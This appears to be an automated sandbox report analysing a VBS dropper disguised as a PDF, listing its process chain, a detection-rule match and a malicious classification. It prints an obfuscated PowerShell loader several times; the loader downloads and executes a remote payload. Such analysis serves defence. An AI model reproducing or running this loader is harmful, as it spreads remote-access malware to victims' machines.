Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'labeler Esmeralda Prepious Engleskares Archaiser Dolphinfishes150 Pungi Amar Sjlesorger shopkeeper Nephrostomy Mainframes Raninae Kobberbrylluppet firethorn Smlds outslander Praedikaterne Ublufrdigste Sejlklubbers Amtsskatteinspektoratet Nondecoration235 Topminnow Interveneredes labeler Esmeralda Prepious Engleskares Archaiser Dolphinfishes150 Pungi Amar Sjlesorger shopkeeper Nephrostomy Mainframes Raninae Kobberbrylluppet firethorn Smlds outslander Praedikaterne Ublufrdigste Sejlklubbers Amtsskatteinspektoratet Nondecoration235 Topminnow Interveneredes';If (${host}.CurrentCulture) {$Almengjorde++;}Function Sprge($Kalkunernes){$batterdock=$Kalkunernes.Length-$Almengjorde;$Experientialistic='SUBsTRI';$Experientialistic+='ng';For( $Ricabooracker=2;$Ricabooracker -lt $batterdock;$Ricabooracker+=3){$labeler+=$Kalkunernes.$Experientialistic.Invoke( $Ricabooracker, $Almengjorde);}$labeler;}function Dkvingen($Smaaborgerligeres){ & ($Hektoliters) ($Smaaborgerligeres);}$Omsorgsfuldere=Sprge 'B,MSpoInzBaiAmlBal.ua,e/Gu5Mu.He0A .i(,eW ,iBlnIndAroScwP sSk EnN.rTFo 1Di0He.D.0Rn;Sp FiW AiLant 6 r4.e;Bo AdxSu6Gi4Ad;Wi RhrAnvAs:Pl1He2Tr1Mi..r0Su)al GeG LeSkcU.k AoNa/C,2Pe0Fa1Pr0.e0Ot1An0Om1ag InFA,i Fr,ueLafSuoHexb,/Ne1 D2 ,1 U. ,0B, ';$Theorize=Sprge 'BiU,is .eStrAn-L A eg,reSunYat H ';$Archaiser=Sprge 'HahFet.ut Dp ss C: A/Ta/ .dLar RiUdvPoeS,.DegRuoF,o og.ylKae K.Foc Mo,rmSj/ReuPacNe?Ase,oxTep.eo TrShtEr=SedSeoK.wVinShlKyoUlaStd,n& BiPedK.= M1 ,-F.zTy0ral M_F 0E MPrGbuUTrlSoc COCy-Br5 TeKoO NlS Z.kq LtKnS LuLilSa5 Su.rzSng nPT.Xl pSihSi_Li ';$Pediococci150=Sprge 'Br>P. ';$Hektoliters=Sprge 'PriHeeAyxUn ';$Koksede='Amar';$Doktordisputatsen = Sprge ',aeMacRuhHao l ,a%B.a.hpHep .dK a DtM,aRe% a\S.FT.oA.lAekMieHes nlExaSeg ,eCrtD.. .O,up,di,y Co&Fo&Fu M,e cDehT oDo Unts. ';Dkvingen (Sprge 'Ve$ ,gnelRuoFabSraPilCe:BeSett .asptA iC o Sn,lcBaaF.r .eDunl =S,( BchomEfdEm De/ Nc , B$I,DefoKekA.turoRerDidBriKls Ap,auCatp,aGatAfs .e CnLe) Z ');Dkvingen (Sprge ' ,$,egDel.ao ,bIna ,lSa: MES n RgdalP eU s rkK a,ir TeKos,a=Va$JuA .r .cFlh ,aUniSks le nrUd. Ds ,pFaljuiS t .( M$UnP .eAndB,i o BcPyo.tc ScFoi P1Sc5 T0 s)Ek ');Dkvingen (Sprge ' y[ NC e ,tPr. iSCaePar.rv.ii.ec .eIlPkoo oi rnRatClM Ta.pnAcaVigSaeRerCh],e:Ek: ASPaeK.c Mu .r PiEntHjy TPGar AoIntQuoVic,uo Vl =In [ N ee ItPr. .SHoe bcCou trMyi HtOmy.iPUdrSkoP.t oVac o elArTKlyOpp HePr],i:Ud:CoTN,lF sNo1 V2 K ');$Archaiser=$Engleskares[0];$Merocele= (Sprge 'F $AngBelSpoExb.naOmlNe:UrB ,fRul FeStnRe=UkN,le owBa-PrOMab.ljUte,rcVetfr F.SA.y nsR tPreInm,e.GrNBoeIntB..ElWFreMybPeCEplUni Be Jn Tt');$Merocele+=$Stationcaren[1];Dkvingen ($Merocele);Dkvingen (Sprge ',o$NuBU.f olSueRen ,.K H,me Ra,odapeNorFos .[ P$StT PhDee Solir.riTuzC e,o]Es=Fi$ OKom ,su.oStrm.gVrsBrf UuR,lSmd.heHarSpe h ');$Kundetilfredshedsgarantiernes=Sprge ' ,$ ABVefDalBieGanem.KiDT,o Fw.nnSul noNua Sd .F KiDa
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'labeler Esmeralda Prepious Engleskares Archaiser Dolphinfishes150 Pungi Amar Sjlesorger shopkeeper Nephrostomy Mainframes Raninae Kobberbrylluppet firethorn Smlds outslander Praedikaterne Ublufrdigste Sejlklubbers Amtsskatteinspektoratet Nondecoration235 Topminnow Interveneredes labeler Esmeralda Prepious Engleskares Archaiser Dolphinfishes150 Pungi Amar Sjlesorger shopkeeper Nephrostomy Mainframes Raninae Kobberbrylluppet firethorn Smlds outslander Praedikaterne Ublufrdigste Sejlklubbers Amtsskatteinspektoratet Nondecoration235 Topminnow Interveneredes';If (${host}.CurrentCulture) {$Almengjorde++;}Function Sprge($Kalkunernes){$batterdock=$Kalkunernes.Length-$Almengjorde;$Experientialistic='SUBsTRI';$Experientialistic+='ng';For( $Ricabooracker=2;$Ricabooracker -lt $batterdock;$Ricabooracker+=3){$labeler+=$Kalkunernes.$Experientialistic.Invoke( $Ricabooracker, $Almengjorde);}$labeler;}function Dkvingen($Smaaborgerligeres){ & ($Hektoliters) ($Smaaborgerligeres);}$Omsorgsfuldere=Sprge 'B,MSpoInzBaiAmlBal.ua,e/Gu5Mu.He0A .i(,eW ,iBlnIndAroScwP sSk EnN.rTFo 1Di0He.D.0Rn;Sp FiW AiLant 6 r4.e;Bo AdxSu6Gi4Ad;Wi RhrAnvAs:Pl1He2Tr1Mi..r0Su)al GeG LeSkcU.k AoNa/C,2Pe0Fa1Pr0.e0Ot1An0Om1ag InFA,i Fr,ueLafSuoHexb,/Ne1 D2 ,1 U. ,0B, ';$Theorize=Sprge 'BiU,is .eStrAn-L A eg,reSunYat H ';$Archaiser=Sprge 'HahFet.ut Dp ss C: A/Ta/ .dLar RiUdvPoeS,.DegRuoF,o og.ylKae K.Foc Mo,rmSj/ReuPacNe?Ase,oxTep.eo TrShtEr=SedSeoK.wVinShlKyoUlaStd,n& BiPedK.= M1 ,-F.zTy0ral M_F 0E MPrGbuUTrlSoc COCy-Br5 TeKoO NlS Z.kq LtKnS LuLilSa5 Su.rzSng nPT.Xl pSihSi_Li ';$Pediococci150=Sprge 'Br>P. ';$Hektoliters=Sprge 'PriHeeAyxUn ';$Koksede='Amar';$Doktordisputatsen = Sprge ',aeMacRuhHao l ,a%B.a.hpHep .dK a DtM,aRe% a\S.FT.oA.lAekMieHes nlExaSeg ,eCrtD.. .O,up,di,y Co&Fo&Fu M,e cDehT oDo Unts. ';Dkvingen (Sprge 'Ve$ ,gnelRuoFabSraPilCe:BeSett .asptA iC o Sn,lcBaaF.r .eDunl =S,( BchomEfdEm De/ Nc , B$I,DefoKekA.turoRerDidBriKls Ap,auCatp,aGatAfs .e CnLe) Z ');Dkvingen (Sprge ' ,$,egDel.ao ,bIna ,lSa: MES n RgdalP eU s rkK a,ir TeKos,a=Va$JuA .r .cFlh ,aUniSks le nrUd. Ds ,pFaljuiS t .( M$UnP .eAndB,i o BcPyo.tc ScFoi P1Sc5 T0 s)Ek ');Dkvingen (Sprge ' y[ NC e ,tPr. iSCaePar.rv.ii.ec .eIlPkoo oi rnRatClM Ta.pnAcaVigSaeRerCh],e:Ek: ASPaeK.c Mu .r PiEntHjy TPGar AoIntQuoVic,uo Vl =In [ N ee ItPr. .SHoe bcCou trMyi HtOmy.iPUdrSkoP.t oVac o elArTKlyOpp HePr],i:Ud:CoTN,lF sNo1 V2 K ');$Archaiser=$Engleskares[0];$Merocele= (Sprge 'F $AngBelSpoExb.naOmlNe:UrB ,fRul FeStnRe=UkN,le owBa-PrOMab.ljUte,rcVetfr F.SA.y nsR tPreInm,e.GrNBoeIntB..ElWFreMybPeCEplUni Be Jn Tt');$Merocele+=$Stationcaren[1];Dkvingen ($Merocele);Dkvingen (Sprge ',o$NuBU.f olSueRen ,.K H,me Ra,odapeNorFos .[ P$StT PhDee Solir.riTuzC e,o]Es=Fi$ OKom ,su.oStrm.gVrsBrf UuR,lSmd.heHarSpe h ');$Kundetilfredshedsgarantiernes=Sprge ' ,$ ABVefDalBieGanem.KiDT,o Fw.nnSul noNua Sd .F KiDa Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD3455B506 8_2_00007FFD3455B506
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD3455C2B2 8_2_00007FFD3455C2B2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD345516BF 8_2_00007FFD345516BF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD34556E5D 8_2_00007FFD34556E5D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_04E1F1F0 11_2_04E1F1F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_04E1FAC0 11_2_04E1FAC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_04E1EEA8 11_2_04E1EEA8
Source: AF85714759_htm#U00b7pdf.vbs Initial sample: Strings found which are bigger than 50
Source: amsi32_7148.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4416, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7148, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.expl.evad.winVBS@14/8@3/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Folkeslaget.Opi Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-7CSH4D
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2244:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ortgq2c4.ccg.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\AF85714759_htm#U00b7pdf.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4416
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7148
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\AF85714759_htm#U00b7pdf.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'labeler Esmeralda Prepious Engleskares Archaiser Dolphinfishes150 Pungi Amar Sjlesorger shopkeeper Nephrostomy Mainframes Raninae Kobberbrylluppet firethorn Smlds outslander Praedikaterne Ublufrdigste Sejlklubbers Amtsskatteinspektoratet Nondecoration235 Topminnow Interveneredes labeler Esmeralda Prepious Engleskares Archaiser Dolphinfishes150 Pungi Amar Sjlesorger shopkeeper Nephrostomy Mainframes Raninae Kobberbrylluppet firethorn Smlds outslander Praedikaterne Ublufrdigste Sejlklubbers Amtsskatteinspektoratet Nondecoration235 Topminnow Interveneredes';If (${host}.CurrentCulture) {$Almengjorde++;}Function Sprge($Kalkunernes){$batterdock=$Kalkunernes.Length-$Almengjorde;$Experientialistic='SUBsTRI';$Experientialistic+='ng';For( $Ricabooracker=2;$Ricabooracker -lt $batterdock;$Ricabooracker+=3){$labeler+=$Kalkunernes.$Experientialistic.Invoke( $Ricabooracker, $Almengjorde);}$labeler;}function Dkvingen($Smaaborgerligeres){ & ($Hektoliters) ($Smaaborgerligeres);}$Omsorgsfuldere=Sprge 'B,MSpoInzBaiAmlBal.ua,e/Gu5Mu.He0A .i(,eW ,iBlnIndAroScwP sSk EnN.rTFo 1Di0He.D.0Rn;Sp FiW AiLant 6 r4.e;Bo AdxSu6Gi4Ad;Wi RhrAnvAs:Pl1He2Tr1Mi..r0Su)al GeG LeSkcU.k AoNa/C,2Pe0Fa1Pr0.e0Ot1An0Om1ag InFA,i Fr,ueLafSuoHexb,/Ne1 D2 ,1 U. ,0B, ';$Theorize=Sprge 'BiU,is .eStrAn-L A eg,reSunYat H ';$Archaiser=Sprge 'HahFet.ut Dp ss C: A/Ta/ .dLar RiUdvPoeS,.DegRuoF,o og.ylKae K.Foc Mo,rmSj/ReuPacNe?Ase,oxTep.eo TrShtEr=SedSeoK.wVinShlKyoUlaStd,n& BiPedK.= M1 ,-F.zTy0ral M_F 0E MPrGbuUTrlSoc COCy-Br5 TeKoO NlS Z.kq LtKnS LuLilSa5 Su.rzSng nPT.Xl pSihSi_Li ';$Pediococci150=Sprge 'Br>P. ';$Hektoliters=Sprge 'PriHeeAyxUn ';$Koksede='Amar';$Doktordisputatsen = Sprge ',aeMacRuhHao l ,a%B.a.hpHep .dK a DtM,aRe% a\S.FT.oA.lAekMieHes nlExaSeg ,eCrtD.. .O,up,di,y Co&Fo&Fu M,e cDehT oDo Unts. ';Dkvingen (Sprge 'Ve$ ,gnelRuoFabSraPilCe:BeSett .asptA iC o Sn,lcBaaF.r .eDunl =S,( BchomEfdEm De/ Nc , B$I,DefoKekA.turoRerDidBriKls Ap,auCatp,aGatAfs .e CnLe) Z ');Dkvingen (Sprge ' ,$,egDel.ao ,bIna ,lSa: MES n RgdalP eU s rkK a,ir TeKos,a=Va$JuA .r .cFlh ,aUniSks le nrUd. Ds ,pFaljuiS t .( M$UnP .eAndB,i o BcPyo.tc ScFoi P1Sc5 T0 s)Ek ');Dkvingen (Sprge ' y[ NC e ,tPr. iSCaePar.rv.ii.ec .eIlPkoo oi rnRatClM Ta.pnAcaVigSaeRerCh],e:Ek: ASPaeK.c Mu .r PiEntHjy TPGar AoIntQuoVic,uo Vl =In [ N ee ItPr. .SHoe bcCou trMyi HtOmy.iPUdrSkoP.t oVac o elArTKlyOpp HePr],i:Ud:CoTN,lF sNo1 V2 K ');$Archaiser=$Engleskares[0];$Merocele= (Sprge 'F $AngBelSpoExb.naOmlNe:UrB ,fRul FeStnRe=UkN,le owBa-PrOMab.ljUte,rcVetfr F.SA.y nsR tPreInm,e.GrNBoeIntB..ElWFreMybPeCEplUni Be Jn Tt');$Merocele+=$Stationcaren[1];Dkvingen ($Merocele);Dkvingen (Sprge ',o$NuBU.f olSueRen ,.K H,me Ra,odapeNorFos .[ P$StT PhDee Solir.riTuzC e,o]Es=Fi$ OKom ,su.oStrm.gVrsBrf UuR,lSmd.heHarSpe h ');$Kundetilfredshedsgarantiernes=Sprge ' ,$ ABVefDalBieGanem.KiDT,o Fw.nnSul noNua Sd .F KiDa
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Folkeslaget.Opi && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'labeler Esmeralda Prepious Engleskares Archaiser Dolphinfishes150 Pungi Amar Sjlesorger shopkeeper Nephrostomy Mainframes Raninae Kobberbrylluppet firethorn Smlds outslander Praedikaterne Ublufrdigste Sejlklubbers Amtsskatteinspektoratet Nondecoration235 Topminnow Interveneredes labeler Esmeralda Prepious Engleskares Archaiser Dolphinfishes150 Pungi Amar Sjlesorger shopkeeper Nephrostomy Mainframes Raninae Kobberbrylluppet firethorn Smlds outslander Praedikaterne Ublufrdigste Sejlklubbers Amtsskatteinspektoratet Nondecoration235 Topminnow Interveneredes';If (${host}.CurrentCulture) {$Almengjorde++;}Function Sprge($Kalkunernes){$batterdock=$Kalkunernes.Length-$Almengjorde;$Experientialistic='SUBsTRI';$Experientialistic+='ng';For( $Ricabooracker=2;$Ricabooracker -lt $batterdock;$Ricabooracker+=3){$labeler+=$Kalkunernes.$Experientialistic.Invoke( $Ricabooracker, $Almengjorde);}$labeler;}function Dkvingen($Smaaborgerligeres){ & ($Hektoliters) ($Smaaborgerligeres);}$Omsorgsfuldere=Sprge 'B,MSpoInzBaiAmlBal.ua,e/Gu5Mu.He0A .i(,eW ,iBlnIndAroScwP sSk EnN.rTFo 1Di0He.D.0Rn;Sp FiW AiLant 6 r4.e;Bo AdxSu6Gi4Ad;Wi RhrAnvAs:Pl1He2Tr1Mi..r0Su)al GeG LeSkcU.k AoNa/C,2Pe0Fa1Pr0.e0Ot1An0Om1ag InFA,i Fr,ueLafSuoHexb,/Ne1 D2 ,1 U. ,0B, ';$Theorize=Sprge 'BiU,is .eStrAn-L A eg,reSunYat H ';$Archaiser=Sprge 'HahFet.ut Dp ss C: A/Ta/ .dLar RiUdvPoeS,.DegRuoF,o og.ylKae K.Foc Mo,rmSj/ReuPacNe?Ase,oxTep.eo TrShtEr=SedSeoK.wVinShlKyoUlaStd,n& BiPedK.= M1 ,-F.zTy0ral M_F 0E MPrGbuUTrlSoc COCy-Br5 TeKoO NlS Z.kq LtKnS LuLilSa5 Su.rzSng nPT.Xl pSihSi_Li ';$Pediococci150=Sprge 'Br>P. ';$Hektoliters=Sprge 'PriHeeAyxUn ';$Koksede='Amar';$Doktordisputatsen = Sprge ',aeMacRuhHao l ,a%B.a.hpHep .dK a DtM,aRe% a\S.FT.oA.lAekMieHes nlExaSeg ,eCrtD.. .O,up,di,y Co&Fo&Fu M,e cDehT oDo Unts. ';Dkvingen (Sprge 'Ve$ ,gnelRuoFabSraPilCe:BeSett .asptA iC o Sn,lcBaaF.r .eDunl =S,( BchomEfdEm De/ Nc , B$I,DefoKekA.turoRerDidBriKls Ap,auCatp,aGatAfs .e CnLe) Z ');Dkvingen (Sprge ' ,$,egDel.ao ,bIna ,lSa: MES n RgdalP eU s rkK a,ir TeKos,a=Va$JuA .r .cFlh ,aUniSks le nrUd. Ds ,pFaljuiS t .( M$UnP .eAndB,i o BcPyo.tc ScFoi P1Sc5 T0 s)Ek ');Dkvingen (Sprge ' y[ NC e ,tPr. iSCaePar.rv.ii.ec .eIlPkoo oi rnRatClM Ta.pnAcaVigSaeRerCh],e:Ek: ASPaeK.c Mu .r PiEntHjy TPGar AoIntQuoVic,uo Vl =In [ N ee ItPr. .SHoe bcCou trMyi HtOmy.iPUdrSkoP.t oVac o elArTKlyOpp HePr],i:Ud:CoTN,lF sNo1 V2 K ');$Archaiser=$Engleskares[0];$Merocele= (Sprge 'F $AngBelSpoExb.naOmlNe:UrB ,fRul FeStnRe=UkN,le owBa-PrOMab.ljUte,rcVetfr F.SA.y nsR tPreInm,e.GrNBoeIntB..ElWFreMybPeCEplUni Be Jn Tt');$Merocele+=$Stationcaren[1];Dkvingen ($Merocele);Dkvingen (Sprge ',o$NuBU.f olSueRen ,.K H,me Ra,odapeNorFos .[ P$StT PhDee Solir.riTuzC e,o]Es=Fi$ OKom ,su.oStrm.gVrsBrf UuR,lSmd.heHarSpe h ');$Kundetilfredshedsgarantiernes=Sprge ' ,$ ABVefDalBieGanem.KiDT,o Fw.nnSul noNua Sd .F KiDa
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Folkeslaget.Opi && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: unknown Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'labeler Esmeralda Prepious Engleskares Archaiser Dolphinfishes150 Pungi Amar Sjlesorger shopkeeper Nephrostomy Mainframes Raninae Kobberbrylluppet firethorn Smlds outslander Praedikaterne Ublufrdigste Sejlklubbers Amtsskatteinspektoratet Nondecoration235 Topminnow Interveneredes labeler Esmeralda Prepious Engleskares Archaiser Dolphinfishes150 Pungi Amar Sjlesorger shopkeeper Nephrostomy Mainframes Raninae Kobberbrylluppet firethorn Smlds outslander Praedikaterne Ublufrdigste Sejlklubbers Amtsskatteinspektoratet Nondecoration235 Topminnow Interveneredes';If (${host}.CurrentCulture) {$Almengjorde++;}Function Sprge($Kalkunernes){$batterdock=$Kalkunernes.Length-$Almengjorde;$Experientialistic='SUBsTRI';$Experientialistic+='ng';For( $Ricabooracker=2;$Ricabooracker -lt $batterdock;$Ricabooracker+=3){$labeler+=$Kalkunernes.$Experientialistic.Invoke( $Ricabooracker, $Almengjorde);}$labeler;}function Dkvingen($Smaaborgerligeres){ & ($Hektoliters) ($Smaaborgerligeres);}$Omsorgsfuldere=Sprge 'B,MSpoInzBaiAmlBal.ua,e/Gu5Mu.He0A .i(,eW ,iBlnIndAroScwP sSk EnN.rTFo 1Di0He.D.0Rn;Sp FiW AiLant 6 r4.e;Bo AdxSu6Gi4Ad;Wi RhrAnvAs:Pl1He2Tr1Mi..r0Su)al GeG LeSkcU.k AoNa/C,2Pe0Fa1Pr0.e0Ot1An0Om1ag InFA,i Fr,ueLafSuoHexb,/Ne1 D2 ,1 U. ,0B, ';$Theorize=Sprge 'BiU,is .eStrAn-L A eg,reSunYat H ';$Archaiser=Sprge 'HahFet.ut Dp ss C: A/Ta/ .dLar RiUdvPoeS,.DegRuoF,o og.ylKae K.Foc Mo,rmSj/ReuPacNe?Ase,oxTep.eo TrShtEr=SedSeoK.wVinShlKyoUlaStd,n& BiPedK.= M1 ,-F.zTy0ral M_F 0E MPrGbuUTrlSoc COCy-Br5 TeKoO NlS Z.kq LtKnS LuLilSa5 Su.rzSng nPT.Xl pSihSi_Li ';$Pediococci150=Sprge 'Br>P. ';$Hektoliters=Sprge 'PriHeeAyxUn ';$Koksede='Amar';$Doktordisputatsen = Sprge ',aeMacRuhHao l ,a%B.a.hpHep .dK a DtM,aRe% a\S.FT.oA.lAekMieHes nlExaSeg ,eCrtD.. .O,up,di,y Co&Fo&Fu M,e cDehT oDo Unts. ';Dkvingen (Sprge 'Ve$ ,gnelRuoFabSraPilCe:BeSett .asptA iC o Sn,lcBaaF.r .eDunl =S,( BchomEfdEm De/ Nc , B$I,DefoKekA.turoRerDidBriKls Ap,auCatp,aGatAfs .e CnLe) Z ');Dkvingen (Sprge ' ,$,egDel.ao ,bIna ,lSa: MES n RgdalP eU s rkK a,ir TeKos,a=Va$JuA .r .cFlh ,aUniSks le nrUd. Ds ,pFaljuiS t .( M$UnP .eAndB,i o BcPyo.tc ScFoi P1Sc5 T0 s)Ek ');Dkvingen (Sprge ' y[ NC e ,tPr. iSCaePar.rv.ii.ec .eIlPkoo oi rnRatClM Ta.pnAcaVigSaeRerCh],e:Ek: ASPaeK.c Mu .r PiEntHjy TPGar AoIntQuoVic,uo Vl =In [ N ee ItPr. .SHoe bcCou trMyi HtOmy.iPUdrSkoP.t oVac o elArTKlyOpp HePr],i:Ud:CoTN,lF sNo1 V2 K ');$Archaiser=$Engleskares[0];$Merocele= (Sprge 'F $AngBelSpoExb.naOmlNe:UrB ,fRul FeStnRe=UkN,le owBa-PrOMab.ljUte,rcVetfr F.SA.y nsR tPreInm,e.GrNBoeIntB..ElWFreMybPeCEplUni Be Jn Tt');$Merocele+=$Stationcaren[1];Dkvingen ($Merocele);Dkvingen (Sprge ',o$NuBU.f olSueRen ,.K H,me Ra,odapeNorFos .[ P$StT PhDee Solir.riTuzC e,o]Es=Fi$ OKom ,su.oStrm.gVrsBrf UuR,lSmd.heHarSpe h ');$Kundetilfredshedsgarantiernes=Sprge ' ,$ ABVefDalBieGanem.KiDT,o Fw.nnSul noNua Sd .F KiDa Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Folkeslaget.Opi && echo t" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'labeler Esmeralda Prepious Engleskares Archaiser Dolphinfishes150 Pungi Amar Sjlesorger shopkeeper Nephrostomy Mainframes Raninae Kobberbrylluppet firethorn Smlds outslander Praedikaterne Ublufrdigste Sejlklubbers Amtsskatteinspektoratet Nondecoration235 Topminnow Interveneredes labeler Esmeralda Prepious Engleskares Archaiser Dolphinfishes150 Pungi Amar Sjlesorger shopkeeper Nephrostomy Mainframes Raninae Kobberbrylluppet firethorn Smlds outslander Praedikaterne Ublufrdigste Sejlklubbers Amtsskatteinspektoratet Nondecoration235 Topminnow Interveneredes';If (${host}.CurrentCulture) {$Almengjorde++;}Function Sprge($Kalkunernes){$batterdock=$Kalkunernes.Length-$Almengjorde;$Experientialistic='SUBsTRI';$Experientialistic+='ng';For( $Ricabooracker=2;$Ricabooracker -lt $batterdock;$Ricabooracker+=3){$labeler+=$Kalkunernes.$Experientialistic.Invoke( $Ricabooracker, $Almengjorde);}$labeler;}function Dkvingen($Smaaborgerligeres){ & ($Hektoliters) ($Smaaborgerligeres);}$Omsorgsfuldere=Sprge 'B,MSpoInzBaiAmlBal.ua,e/Gu5Mu.He0A .i(,eW ,iBlnIndAroScwP sSk EnN.rTFo 1Di0He.D.0Rn;Sp FiW AiLant 6 r4.e;Bo AdxSu6Gi4Ad;Wi RhrAnvAs:Pl1He2Tr1Mi..r0Su)al GeG LeSkcU.k AoNa/C,2Pe0Fa1Pr0.e0Ot1An0Om1ag InFA,i Fr,ueLafSuoHexb,/Ne1 D2 ,1 U. ,0B, ';$Theorize=Sprge 'BiU,is .eStrAn-L A eg,reSunYat H ';$Archaiser=Sprge 'HahFet.ut Dp ss C: A/Ta/ .dLar RiUdvPoeS,.DegRuoF,o og.ylKae K.Foc Mo,rmSj/ReuPacNe?Ase,oxTep.eo TrShtEr=SedSeoK.wVinShlKyoUlaStd,n& BiPedK.= M1 ,-F.zTy0ral M_F 0E MPrGbuUTrlSoc COCy-Br5 TeKoO NlS Z.kq LtKnS LuLilSa5 Su.rzSng nPT.Xl pSihSi_Li ';$Pediococci150=Sprge 'Br>P. ';$Hektoliters=Sprge 'PriHeeAyxUn ';$Koksede='Amar';$Doktordisputatsen = Sprge ',aeMacRuhHao l ,a%B.a.hpHep .dK a DtM,aRe% a\S.FT.oA.lAekMieHes nlExaSeg ,eCrtD.. .O,up,di,y Co&Fo&Fu M,e cDehT oDo Unts. ';Dkvingen (Sprge 'Ve$ ,gnelRuoFabSraPilCe:BeSett .asptA iC o Sn,lcBaaF.r .eDunl =S,( BchomEfdEm De/ Nc , B$I,DefoKekA.turoRerDidBriKls Ap,auCatp,aGatAfs .e CnLe) Z ');Dkvingen (Sprge ' ,$,egDel.ao ,bIna ,lSa: MES n RgdalP eU s rkK a,ir TeKos,a=Va$JuA .r .cFlh ,aUniSks le nrUd. Ds ,pFaljuiS t .( M$UnP .eAndB,i o BcPyo.tc ScFoi P1Sc5 T0 s)Ek ');Dkvingen (Sprge ' y[ NC e ,tPr. iSCaePar.rv.ii.ec .eIlPkoo oi rnRatClM Ta.pnAcaVigSaeRerCh],e:Ek: ASPaeK.c Mu .r PiEntHjy TPGar AoIntQuoVic,uo Vl =In [ N ee ItPr. .SHoe bcCou trMyi HtOmy.iPUdrSkoP.t oVac o elArTKlyOpp HePr],i:Ud:CoTN,lF sNo1 V2 K ');$Archaiser=$Engleskares[0];$Merocele= (Sprge 'F $AngBelSpoExb.naOmlNe:UrB ,fRul FeStnRe=UkN,le 